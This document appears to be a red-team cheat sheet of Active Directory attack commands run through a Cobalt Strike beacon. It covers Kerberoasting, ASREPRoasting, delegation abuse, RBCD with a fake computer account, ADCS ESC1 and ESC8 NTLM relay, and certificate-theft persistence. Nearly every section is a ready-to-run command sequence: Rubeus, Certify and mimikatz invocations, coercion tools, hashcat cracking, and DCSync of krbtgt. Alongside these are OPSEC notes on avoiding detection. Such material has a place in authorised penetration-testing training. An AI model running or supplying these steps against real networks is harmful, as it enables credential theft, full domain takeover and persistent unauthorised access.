Kerberos Attacks & Domain Dominance#
Kerberos Attacks#
Kerberoasting#
Usage: Extract and crack service account passwords by requesting service tickets.
# ===== DISCOVERY PHASE =====
# Method 1: Enumerate Kerberoastable accounts with PowerView
beacon> powerpick Get-DomainUser -SPN | select samaccountname,serviceprincipalname | fl
# Method 2: ADSearch (faster, no PowerShell)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# Method 3: LDAP query via PowerShell
beacon> powerpick Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName,samAccountName
# ===== EXPLOITATION PHASE =====
# Method 1: Rubeus Kerberoasting (recommended - most flexible)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /nowrap
# Kerberoast specific user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap
# Kerberoast with RC4 encryption (easier to crack, but suspicious)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap /rc4
# Kerberoast with AES (default on modern Windows, harder to crack)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap /aes
# Kerberoast with output to file
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /outfile:C:\Temp\kerberoast_hashes.txt /nowrap
# Method 2: Invoke-Kerberoast (PowerView)
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
beacon> powerpick Invoke-Kerberoast -OutputFormat Hashcat | fl
# Method 3: Rubeus statistics (/stats summarizes Kerberoastable accounts and their encryption types without requesting tickets)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /stats
# Method 4: Targeted Kerberoasting (SPN filtering)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /spn:MSSQLSvc* /nowrap
# ===== CRACKING PHASE =====
# Download hashes
beacon> download C:\Temp\kerberoast_hashes.txt
# Crack with hashcat (AES256 - $krb5tgs$18$)
$ hashcat -m 19700 -a 0 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# Crack with hashcat (RC4 - $krb5tgs$23$)
$ hashcat -m 13100 -a 0 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# Crack with John the Ripper
$ john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
# Advanced: Crack with rules
$ hashcat -m 13100 -a 0 kerberoast_hashes.txt wordlist.txt -r best64.rule --force
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Kerberoasting generates Event ID 4769 (TGS request)
# - RC4 (type 23) tickets are suspicious on modern networks (should be AES)
# - Multiple TGS requests from single account may trigger alerts
# - Service accounts often have strong passwords (25+ characters)
# - Target low-privileged service accounts first (less monitoring)
# - Avoid accounts with adminCount=1 (heavily monitored)
# Check for detections
beacon> powerpick Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} -MaxEvents 10 | select TimeCreated,Message
# OPSEC-friendly approach: Request only a few high-value SPNs
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:svc_sharepoint /nowrap
# Cleanup
beacon> shell del C:\Temp\kerberoast_hashes.txt
ASREPRoasting#
Usage: Attack user accounts with “Do not require Kerberos preauthentication” enabled.
# ===== DISCOVERY PHASE =====
# Method 1: Enumerate ASREPRoastable users with PowerView
beacon> powerpick Get-DomainUser -PreauthNotRequired | select samaccountname,distinguishedname | fl
# Method 2: ADSearch (faster)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
# Method 3: LDAP filter via PowerShell
beacon> powerpick Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth,samAccountName
# ===== EXPLOITATION PHASE =====
# Method 1: Rubeus ASREPRoasting (recommended)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /nowrap
# ASREPRoast specific user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap
# ASREPRoast with output to file
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /outfile:C:\Temp\asreproast_hashes.txt /nowrap
# ASREPRoast with domain specification
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /domain:corp.local /dc:dc01.corp.local /nowrap
# Method 2: ASREPRoast with username list (no domain credentials required, only network reach to a DC)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:C:\Temp\users.txt /domain:corp.local /nowrap
# Method 3: PowerView ASREPRoasting
beacon> powerpick Get-DomainUser -PreauthNotRequired | Get-ASRepHash
# ===== CRACKING PHASE =====
# Download hashes
beacon> download C:\Temp\asreproast_hashes.txt
# Crack with hashcat (AS-REP - $krb5asrep$23$)
$ hashcat -m 18200 -a 0 asreproast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# Crack with John the Ripper
$ john --wordlist=/usr/share/wordlists/rockyou.txt asreproast_hashes.txt
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - ASREPRoasting generates Event ID 4768 (TGT request with no pre-auth)
# - Does NOT require valid domain credentials
# - Can be performed from unauthenticated context
# - Pre-auth disabled is rare in production (usually a misconfiguration)
# - Less common than Kerberoasting (fewer targets)
# Advanced: Disable pre-auth on target account (requires permissions)
beacon> powerpick Set-DomainObject -Identity target_user -Set @{useraccountcontrol=4194304}
# Then ASREPRoast
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:target_user /nowrap
# Restore the original userAccountControl value (cleanup) — note that -Clear removes the attribute rather than restoring the previous flags, so record the original value before changing it
beacon> powerpick Set-DomainObject -Identity target_user -Clear useraccountcontrol
# Cleanup
beacon> shell del C:\Temp\asreproast_hashes.txt
Unconstrained Delegation Exploitation#
Usage: Exploit unconstrained delegation to capture TGT tickets from high-value targets.
# ===== DISCOVERY PHASE =====
# Find computers with unconstrained delegation
beacon> powerpick Get-DomainComputer -Unconstrained | select dnshostname,samaccountname | ft -AutoSize
# Alternative: ADSearch
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
# Find users with unconstrained delegation (rare, very dangerous)
beacon> powerpick Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname
# ===== PREREQUISITE: COMPROMISE UNCONSTRAINED DELEGATION HOST =====
# Assume we've compromised srv01.corp.local (has unconstrained delegation)
# Escalate to SYSTEM on the unconstrained delegation host
beacon> getuid
# ===== MONITORING PHASE =====
# Monitor for new TGT tickets (requires SYSTEM privileges)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap /filteruser:DC01$
# Alternative: Monitor without filtering
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:5 /nowrap
# List current cached tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# ===== COERCION PHASE =====
# Force target (DC or admin) to authenticate to our unconstrained delegation host
# Method 1: PrinterBug/SpoolSample (most reliable)
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc01.corp.local srv01.corp.local
# Method 2: PetitPotam (if unpatched)
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe -d corp.local -u jdoe -p password srv01.corp.local dc01.corp.local
# Method 3: Coercer (multiple protocols)
$ proxychains python3 Coercer.py -u jdoe -p password -d corp.local -l srv01.corp.local -t dc01.corp.local
# ===== TICKET EXTRACTION =====
# After coercion, DC$ TGT should be cached
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# Dump the DC computer account TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x123456 /service:krbtgt /nowrap
# Alternative: Dump all tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /nowrap
# ===== EXPLOITATION WITH S4U =====
# Use captured DC TGT to perform S4U2Self (/self) and impersonate any user to services on the DC itself
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.corp.local /user:dc01$ /ticket:doIFuj[...]lDLklP /nowrap
# Alternative: Impersonate domain admin
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:domain_admin /self /altservice:ldap/dc01.corp.local /user:dc01$ /ticket:doIFuj[...]lDLklP /nowrap
# ===== TICKET INJECTION =====
# Create sacrificial logon session and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFyD[...]MuaW8=
# Steal token from sacrificial process
beacon> steal_token <pid>
# Verify access
beacon> ls \\dc01.corp.local\C$
beacon> dcsync corp.local CORP\krbtgt
# Cleanup
beacon> rev2self
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Unconstrained delegation is legacy (rare in modern environments)
# - Coercion attacks generate network traffic and authentication events
# - PrinterBug: Event ID 307 (print spooler)
# - PetitPotam: EFS RPC calls (if monitoring enabled)
# - TGT caching on delegation host is logged in Event ID 4624 (logon type 3)
# - Very powerful attack (DC compromise possible)
Constrained Delegation Exploitation#
Usage: Abuse constrained delegation to impersonate users to specific services.
# ===== DISCOVERY PHASE =====
# Find computers with constrained delegation
beacon> powerpick Get-DomainComputer -TrustedToAuth | select dnshostname,samaccountname,msds-allowedtodelegateto | fl
# Alternative: ADSearch (returns JSON)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# Find users with constrained delegation
beacon> powerpick Get-DomainUser -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | fl
# ===== PREREQUISITE: COMPROMISE CONSTRAINED DELEGATION ACCOUNT =====
# Assume we've compromised sql-2$ (computer account with constrained delegation)
# Escalate to SYSTEM (NT AUTHORITY\SYSTEM) context
# ===== TGT EXTRACTION =====
# Check current privileges
beacon> getuid
# List cached tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# Dump machine account TGT (LUID 0x3e4 = NETWORK SERVICE, which authenticates as the computer account; SYSTEM is 0x3e7)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# Alternative: Request new TGT using machine account hash
beacon> mimikatz !sekurlsa::ekeys
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:sql-2$ /aes256:<aes256_key> /domain:corp.local /nowrap
# ===== S4U ATTACK (SERVICE FOR USER) =====
# Perform S4U2Self + S4U2Proxy to impersonate user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /user:sql-2$ /ticket:doIFLD[...]MuSU8= /nowrap
# Explanation:
# S4U2Self: Obtain forwardable TGS for ourselves as "Administrator"
# S4U2Proxy: Use forwardable ticket to request TGS to cifs/dc01.corp.local
# ===== ALTERNATIVE SERVICE ABUSE =====
# If allowed SPN is limited, use /altservice to request different service
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap
# Common service alternatives:
# cifs -> ldap (DCSync)
# http -> cifs (file access)
# host -> cifs (admin access)
# ===== TICKET INJECTION =====
# Create sacrificial logon and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIGaD[...]ljLmlv
# Steal token
beacon> steal_token <pid>
# Verify access
beacon> ls \\dc01.corp.local\C$
# DCSync if we used ldap service
beacon> dcsync corp.local CORP\krbtgt
# Cleanup
beacon> rev2self
# ===== PROTOCOL TRANSITION EXPLOITATION =====
# If the account has the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag (T2A4D, "protocol transition")
# S4U2Self can be used without an existing cached TGT (Rubeus requests one from the supplied password/hash)
# Check for protocol transition
beacon> powerpick Get-DomainComputer -Identity sql-2 | select useraccountcontrol
# Exploit without TGT (using password or hash)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /user:sql-2$ /rc4:<ntlm_hash> /nowrap
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Constrained delegation is a legitimate feature (less suspicious)
# - S4U requests generate Event ID 4769 (TGS request)
# - S4U2Self: Ticket requests to ourselves
# - S4U2Proxy: Ticket requests to target service
# - Protocol transition is more common than traditional constrained delegation
# - Alternative service abuse may be logged if strict SPN validation enabled
Resource-Based Constrained Delegation (RBCD)#
Usage: Abuse a writable msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
# ===== DISCOVERY PHASE =====
# Find computers with RBCD configured
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" --attributes dnshostname,samaccountname,msDS-AllowedToActOnBehalfOfOtherIdentity --json
# Find computers where we have write access to msDS-AllowedToActOnBehalfOfOtherIdentity
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.ObjectAceType -eq "msDS-AllowedToActOnBehalfOfOtherIdentity" }
# Alternative: Find any writable properties on computer objects
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[\d]{4,10}" }
# Resolve SID to identify who has write access
beacon> powerpick ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
# ===== OPTION 1: USING COMPROMISED COMPUTER ACCOUNT =====
# Scenario: We control wkstn-2$ and have write access to dc-2$'s msDS-AllowedToActOnBehalfOfOtherIdentity
# Get SID of our controlled computer (wkstn-2$)
beacon> powerpick Get-DomainComputer -Identity wkstn-2 -Properties objectSid
# Configure RBCD to allow wkstn-2$ to impersonate to dc-2$
beacon> powerpick $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity dc-2 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
# Verify configuration
beacon> powerpick Get-DomainComputer -Identity dc-2 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
# Alternative: Using StandIn
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer dc-2 --sid S-1-5-21-569305411-121244042-2357301523-1109
# Extract wkstn-2$ TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
# Perform S4U attack
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:wkstn-2$ /impersonateuser:Administrator /msdsspn:cifs/dc-2.corp.local /ticket:doIFuD[...]5JTw== /nowrap
# Inject ticket and access
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIGcD[...]MuaW8=
beacon> steal_token <pid>
beacon> ls \\dc-2.corp.local\C$
# Cleanup: Remove RBCD configuration
beacon> powerpick Get-DomainComputer -Identity dc-2 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity
# ===== OPTION 2: CREATING FAKE COMPUTER ACCOUNT =====
# Check machine account quota (default is 10)
beacon> powerpick Get-DomainObject -Identity "DC=corp,DC=local" -Properties ms-DS-MachineAccountQuota
# Create fake computer account
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make
# Alternative: Using PowerMad
beacon> powershell-import C:\Tools\PowerMad\PowerMad.ps1
beacon> powerpick New-MachineAccount -MachineAccount EvilComputer -Password $(ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force)
# Get SID of created computer
beacon> powerpick Get-DomainComputer -Identity EvilComputer -Properties objectSid
# Configure RBCD on target
beacon> powerpick $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$(Get-DomainComputer -Identity EvilComputer -Properties objectSid | select -ExpandProperty objectSid))"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity dc-2 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
# Generate hash for fake computer account
PS> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:P@ssw0rd123! /user:EvilComputer$ /domain:corp.local
# Request TGT for fake computer
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:EvilComputer$ /aes256:<aes256_hash> /domain:corp.local /nowrap
# Perform S4U attack (same as Option 1)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:EvilComputer$ /impersonateuser:Administrator /msdsspn:cifs/dc-2.corp.local /ticket:doIFuD[...]5JTw== /nowrap
# Cleanup: Remove fake computer and RBCD
beacon> powerpick Remove-DomainComputer -Identity EvilComputer
beacon> powerpick Get-DomainComputer -Identity dc-2 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - RBCD is self-delegation (target allows us to impersonate)
# - Requires write access to msDS-AllowedToActOnBehalfOfOtherIdentity
# - Machine account quota abuse may be monitored (Event ID 4741)
# - RBCD configuration changes are logged (Event ID 5136)
# - More flexible than constrained delegation (attacker-controlled)
# - Clean up RBCD configuration after exploitation
# - Consider using existing computer account instead of creating new one
Active Directory Certificate Services (ADCS) Attacks#
ADCS Enumeration#
Usage: Discover and analyze Certificate Authorities and vulnerable templates.
# ===== CA ENUMERATION =====
# Find Certificate Authorities
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas
# Get detailed CA information
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas /ca:corp-DC-CA
# Alternative: PowerShell enumeration
beacon> powerpick Get-ADObject -Filter * -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -Properties *
# ===== TEMPLATE ENUMERATION =====
# Find all vulnerable certificate templates
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable
# Find specific vulnerability classes
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable /currentuser
# Find templates allowing SAN (Subject Alternative Name)
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /enrolleeSuppliesSubject
# Get detailed template information
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /showAllPermissions
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - ADCS enumeration queries LDAP (Event ID 4662 on DCs, only if object-access auditing is enabled)
# - Certificate requests are logged (Event ID 4886, 4887)
# - Web enrollment can be monitored via IIS logs
# - Denied certificate requests generate Event ID 4888
ESC1: ENROLLEE_SUPPLIES_SUBJECT#
Usage: Abuse certificate templates allowing Subject Alternative Names to impersonate users.
# ===== PREREQUISITE: FIND VULNERABLE TEMPLATE =====
# Find templates with ENROLLEE_SUPPLIES_SUBJECT flag
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable
# Example output:
# Template Name: VulnTemplate
# Enrollment Rights: CORP\Domain Users
# ENROLLEE_SUPPLIES_SUBJECT: True
# ===== EXPLOITATION PHASE =====
# Request certificate with alternative name (impersonate Administrator)
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc01.corp.local\corp-DC-CA /template:VulnTemplate /altname:Administrator
# Output includes Base64-encoded certificate and private key
# ===== CERTIFICATE CONVERSION =====
# Copy certificate and private key to attack machine
# Save as cert.pem
# Convert to PFX format (requires OpenSSL)
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Enter password when prompted (e.g., "password123")
# ===== CERTIFICATE ENCODING =====
# Encode PFX for Rubeus
$ cat cert.pfx | base64 -w 0
# ===== AUTHENTICATION WITH CERTIFICATE =====
# Request TGT using certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:Administrator /certificate:MIIM7w[...]ECAggA /password:password123 /nowrap
# Inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFLz[...]MuaW8=
beacon> steal_token <pid>
beacon> dcsync corp.local CORP\krbtgt
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Certificate request generates Event ID 4886 (certificate requested)
# - Certificate issuance generates Event ID 4887 (certificate issued)
# - Unusual SAN values (admin accounts) may be monitored
# - Certificate authentication generates Event ID 4768 with certificate info
# - Consider requesting certificate for less-monitored accounts first
ESC8: NTLM Relay to ADCS HTTP Endpoints#
Usage: Relay NTLM authentication to ADCS web enrollment for certificate-based attacks.
# ===== PREREQUISITE: IDENTIFY WEB ENROLLMENT =====
# Check for ADCS Web Enrollment
beacon> powerpick Invoke-WebRequest -Uri "http://dc01.corp.local/certsrv" -UseDefaultCredentials
# Enumerate web enrollment endpoints
$ curl -k https://dc01.corp.local/certsrv/certfnsh.asp
# ===== SETUP SOCKS PROXY =====
# Start SOCKS proxy on beacon
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Configure proxychains
$ sudo vim /etc/proxychains4.conf
socks5 127.0.0.1 1080 socks_user socks_password
# ===== SETUP NTLM RELAY =====
# Run ntlmrelayx targeting ADCS web enrollment
$ sudo proxychains ntlmrelayx.py -t https://dc01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --no-http-server --template DomainController
# Alternative: Target specific certificate template
$ sudo proxychains ntlmrelayx.py -t https://dc01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template Machine --no-http-server
# ===== SETUP PORT REDIRECTION =====
# Setup reverse port forward for SMB
beacon> rportfwd 8445 127.0.0.1 445
# Upload WinDivert driver for PortBender
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
# Start PortBender to redirect port 445 to 8445
beacon> PortBender redirect 445 8445
# ===== COERCION PHASE =====
# Method 1: PrinterBug (force DC to authenticate)
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc01.corp.local <current_host_ip>
# Method 2: PetitPotam
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe <current_host_ip> dc01.corp.local
# Method 3: Coercer (multiple protocols)
$ proxychains python3 Coercer.py -u jdoe -p password -d corp.local -l <current_host_ip> -t dc01.corp.local --always-continue
# ===== CERTIFICATE RETRIEVAL =====
# ntlmrelayx will automatically request certificate
# Output: Base64-encoded certificate saved to disk
# Convert certificate to PFX (on attack machine)
$ cat dc01_cert.b64 | base64 -d > dc01_cert.pfx
# ===== AUTHENTICATION WITH CERTIFICATE =====
# Encode certificate for Rubeus
$ cat dc01_cert.pfx | base64 -w 0
# Request TGT using DC certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:dc01$ /certificate:MIIM7w[...]ECAggA /nowrap
# ===== S4U ATTACK WITH MACHINE CERTIFICATE =====
# Use DC$ ticket to perform S4U and impersonate domain admin
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.corp.local /user:dc01$ /ticket:doIFuj[...]lDLklP /nowrap
# Inject ticket and access DC
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFyD[...]MuaW8=
beacon> steal_token <pid>
beacon> ls \\dc01.corp.local\C$
beacon> dcsync corp.local CORP\krbtgt
# ===== CLEANUP =====
# Stop PortBender
beacon> jobs
beacon> jobkill <portbender_job_id>
# Remove WinDivert driver
beacon> shell del C:\Windows\system32\drivers\WinDivert64.sys
# Stop reverse port forward
beacon> rportfwd stop 8445
# Stop SOCKS proxy
beacon> socks stop
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - ESC8 requires NTLM relay to the web-enrollment endpoint; it works when that endpoint accepts NTLM over HTTP without Extended Protection for Authentication (EPA)
# - Certificate requests via web enrollment logged in IIS logs
# - Event ID 4886/4887 (certificate request/issuance)
# - Coercion attacks generate authentication events
# - PortBender requires driver loading (can trigger EDR)
# - Consider scheduling the attack during maintenance windows
ADCS Persistence#
Usage: Maintain persistent access using certificate-based authentication.
User Certificate Persistence#
# ===== ENUMERATE EXISTING CERTIFICATES =====
# Check for existing user certificates
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates
# List user certificates with Mimikatz
beacon> mimikatz crypto::certificates /systemstore:CURRENT_USER
# ===== EXPORT USER CERTIFICATES =====
# Export all user certificates (including private keys)
beacon> mimikatz crypto::certificates /export
# Certificates saved to disk as .pfx files
# Download exported certificates
beacon> download "CURRENT_USER_My_0_Administrator.pfx"
# Alternative: Export specific certificate by thumbprint
beacon> powerpick $cert = Get-ChildItem -Path Cert:\CurrentUser\My\<thumbprint>; Export-PfxCertificate -Cert $cert -FilePath C:\Temp\user_cert.pfx -Password (ConvertTo-SecureString -String "password123" -Force -AsPlainText)
# ===== ENCODE CERTIFICATE FOR RUBEUS =====
# Encode PFX on Linux
$ cat "CURRENT_USER_My_0_Administrator.pfx" | base64 -w 0
# ===== AUTHENTICATE WITH STOLEN CERTIFICATE =====
# Request TGT using certificate (use "mimikatz" as password if exported by Mimikatz)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:Administrator /certificate:MIINeg[...]IH0A== /password:mimikatz /enctype:aes256 /nowrap
# Inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFLz[...]MuaW8=
beacon> steal_token <pid>
# ===== REQUEST NEW USER CERTIFICATE (IF NONE EXISTS) =====
# Request certificate using User template
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc01.corp.local\corp-DC-CA /template:User
# Follow steps from ESC1 to convert and use certificate
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Certificate theft provides long-term access (typically 1 year validity)
# - Certificate authentication generates Event ID 4768 with cert info
# - Stolen certificates work even after password changes
# - Revocation (CRL/OCSP) still applies: a revoked certificate is rejected at authentication
# - Less suspicious than repeated password authentication
Computer Certificate Persistence#
# ===== EXPORT MACHINE CERTIFICATE (REQUIRES SYSTEM) =====
# Verify SYSTEM privileges
beacon> getuid
# Export machine certificates
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
# Download machine certificate
beacon> download "LOCAL_MACHINE_My_0_DC01.corp.local.pfx"
# ===== ENCODE CERTIFICATE =====
$ cat "LOCAL_MACHINE_My_0_DC01.corp.local.pfx" | base64 -w 0
# ===== AUTHENTICATE WITH MACHINE CERTIFICATE =====
# Request TGT for computer account
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:DC01$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap
# Perform S4U to impersonate users
